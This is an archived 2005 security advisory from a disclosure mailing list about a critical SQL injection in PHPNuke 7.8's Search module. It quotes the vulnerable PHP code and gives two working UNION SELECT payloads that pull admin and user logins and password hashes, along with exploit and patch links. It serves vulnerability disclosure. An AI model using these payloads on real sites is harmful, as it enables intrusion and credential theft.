lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200511151517560201.012291E8@smtp.securityreason.com>
Date: Tue Nov 15 14:37:19 2005
From: sp3x at securityreason.com (SecurityReason - sp3x)
Subject: Critical SQL Injection PHPNuke <= 7.8

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SecurityAlert SA027

Author: sp3x
GPG: http://securityreason.com/key/sp3x.gpg
Date: 15. November 2005

Affected software :
===================

PHPNuke version : 7.8 with all security fixes/patches

Not Affected software :
=======================

PHPNuke version : 7.9 + patch 3.1

Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online community or whatever you want to call it. The goal of PHP-Nuke is to have an automated web site to distribute news and articles with users system. Each user can submit comments to discuss the articles, just similar to Slashdot and many others. Main features include: web based admin, surveys, top page, access stats page with counter, user customizable box, themes manager for registered users, friendly administration GUI with graphic topic manager, option to edit or delete stories, option to delete comments, moderation system, Referers page to know who link us, sections manager, customizable HTML blocks, user and authors edit, an integrated Banners Ads system, search engine, backend/headlines generation (RSS/RDF format), and many, many more friendly functions. PHP-Nuke is written 100% in PHP and requires Apache Web server, PHP and a SQL (MySQL, mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase). Support for 25 languages, Yahoo like search engine, Comments option in Polls, lot of themes, Ephemerids manager, File Manager, Headlines, download manager, faq manager, advanced blocks systems, reviews system, newsletter, categorized articles, multilanguage content management, phpBB Forums included and a lot more.


Vulnerabilities :
*****************

Critical SQL injection   :
==========================

IN module called "Search" there exists  SQL Injection bug, which can lead to stealing admin`s username and password md5 and also some sensitive data from database.


The problem exist in index.php so first let's see the source code of this file.

Original code from index.php :
- ---------------------------------
...
$query = stripslashes(check_html($query, "nohtml"));
  if ($type=="stories" OR !$type) {

   if ($category > 0) {
    $categ = "AND catid='$category' ";
   } else {
    $categ = "";
   }
   $q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic from ".$prefix."_stories s, ".$prefix."_authors a where s.aid=a.aid $queryalang $categ";
   if (isset($query)) $q .= "AND (s.title LIKE '%$query%' OR s.hometext LIKE '%$query%' OR s.bodytext LIKE '%$query%' OR s.notes LIKE '%$query%') ";
   if (!empty($author)) $q .= "AND s.aid='$author' ";
   if (!empty($topic)) $q .= "AND s.topic='$topic' ";
   if (!empty($days) && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' ";
   $q .= " ORDER BY s.time DESC LIMIT $min,$offset";
   $t = $topic;
   $result5 = $db->sql_query($q);
   $nrows = $db->sql_numrows($result5);
....
- -----------------------------------

Here we can see that there is stripslashes() used on $query variable . 
Using stripslashes(); before mysql statment lead to critical Sql Injection attack.
This Sql Injection will work in every type of Search .
Here i mean  : 
type=="stories"
type=="comments"
type=="reviews"
type=="users"

And also will work when  is_active("Downloads") , is_active("Web_Links") or is_active("Encyclopedia").

So we have here about 7 Critical SQL injections.

Exploit test :
- --------------

Enter this into Search field :
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/* -> users passwords and logins

s%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/* -> nuke_authors passwords and logins

Exploit :
- ---------

http://securityreason.com/achievement_exploitalert/5

How to fix :
============

Download the new version of the script or update.
http://securityreason.com/patch/6

Greets :
========

Special greets : cXIb8O3 , pkw, pi3, p_e_a  and others .


Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)

iD8DBQFDedrRhaZ93YsJSwQRArwUAKCaSKtt8nqY66P3xazISfls+1VfoACglrMU
yDQ955aOQpjnDMqXPvClE/I=
=+sx9
-----END PGP SIGNATURE-----

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051115/94cef037/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ